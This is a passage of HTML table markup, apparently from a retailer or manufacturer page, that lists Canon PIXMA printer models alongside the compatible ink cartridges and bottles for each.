width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 